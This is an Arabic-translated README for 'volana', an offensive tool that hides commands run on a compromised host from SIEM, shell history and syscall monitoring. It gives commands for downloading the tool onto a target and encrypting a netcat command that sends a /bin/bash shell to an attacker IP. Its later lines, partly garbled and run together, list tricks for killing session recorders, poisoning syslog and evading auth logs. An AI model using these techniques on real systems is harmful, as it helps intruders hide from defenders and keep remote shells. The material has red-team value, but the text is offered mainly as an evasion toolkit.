
🌒 إخفاء أوامر الشِل لتجنب أنظمة الكشف
أثناء اختبار الاختراق، أحد الجوانب المهمة هو الاختفاء. لهذا السبب يجب عليك مسح آثارك بعد مرورك. ومع ذلك، تقوم العديد من البنى التحتية بتسجيل الأوامر وإرسالها إلى نظام SIEM في الوقت الفعلي مما يجعل عملية التنظيف اللاحقة وحدها غير مجدية.volana توفر طريقة بسيطة لإخفاء الأوامر المنفذة على الجهاز المخترق من خلال توفير بيئة تشغيل خاصة بها (أدخل أمرك، ينفذه volana نيابة عنك). بهذه الطريقة يمكنك مسح آثارك أثناء مرورك
تحتاج إلى الحصول على شل تفاعلي. (ابحث عن طريقة لتشغيله، أنت هاكر، هذه مهمتك! وإلا). ثم قم بتنزيله على الجهاز الهدف وشغله. هذا كل شيء، الآن يمكنك كتابة الأمر الذي تريد تنفيذه بشكل متخفي.
## قم بتنزيله من إصدارات GitHub
## إذا لم يكن لديك اتصال بالإنترنت من الجهاز المخترق، ابحث عن طريقة أخرى
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## قم بتنفيذه
./volana
## أنت الآن تحت الرادار
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana » [command]
كلمات مفتاحية لوحدة تحكم volana:
ring: تفعيل وضع الرنين، أي يتم إطلاق كل أمر مع العديد من الأوامر الأخرى لتغطية الآثار (من الحلول التي تراقب استدعاءات النظام)exit: الخروج من وحدة تحكم volanaتخيل أن لديك شل غير تفاعلي (webshell أو rce أعمى)، يمكنك استخدام الأمرين الفرعيين encrypt و decrypt.
مسبقًا، تحتاج إلى بناء volana بمفتاح تشفير مدمج.
على جهاز المهاجم
## بناء volana بمفتاح تشفير
make build.volana-with-encryption
## نقله إلى الهدف (الأمر الوحيد القابل للكشف)
## [...]
## تشفير الأمر الذي تريد تنفيذه بشكل متخفي
## (هنا nc bindshell للحصول على شل تفاعلي)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
انسخ الأمر المشفر ونفذه باستخدام rce الخاص بك على الجهاز الهدف
./volana decr [encrypted_command]
## الآن لديك bindshell، قم بتشغيله لجعله تفاعليًا واستخدم volana كالمعتاد لتكون متخفيًا (./volana). + لا تنس إزالة ملف volana الثنائي قبل المغادرة (لأن مفتاح فك التشفير يمكن استرجاعه منه بسهولة)
لماذا لا نكتفي بإخفاء الأمر باستخدام echo [command] | base64 ؟
وفك التشفير على الهدف بـ echo [encoded_command] | base64 -d | bash
لأننا نريد الحماية من الأنظمة التي تطلق إنذارًا لاستخدام base64 أو التي تبحث عن نص base64 في الأوامر. كما نريد جعل التحقيق صعبًا، وbase64 ليس عائقًا حقيقيًا.
ضع في اعتبارك أن volana ليس معجزة ستجعلك غير مرئي تمامًا. هدفه هو جعل اكتشاف الاختراق والتحقيق أكثر صعوبة.
نعني بـ "يمكن اكتشافه" إذا كنا قادرين على إطلاق إنذار عند تنفيذ أمر معين.
فقط سطر الأمر الخاص بتشغيل volana سيتم التقاطه. 🧠 ومع ذلك، بإضافة مسافة قبل تنفيذه، السلوك الافتراضي لـ bash هو عدم حفظه.
.bash_history، ".zsh_history" إلخ..opensnoop)script، screen -L، sexonthebash، ovh-ttyrec، إلخ..)
pkill -9 scriptscreen أصعب قليلاً في التجنب، لكنه لا يسجل الإدخال (إدخال سري: stty -echo => تجنب)volana مع التشفير./var/log/auth.log)
sudo أو sulogger -p auth.info "No hacker is poisoning your syslog solution, don't worry")LD_PRELOAD مخصص لتسجيل الدخول
عذرًا على العنوان المضلل، لكن لن يتم تقديم أي أموال للمساهمين. 🐛
أخبرني إذا وجدت:
volanavolana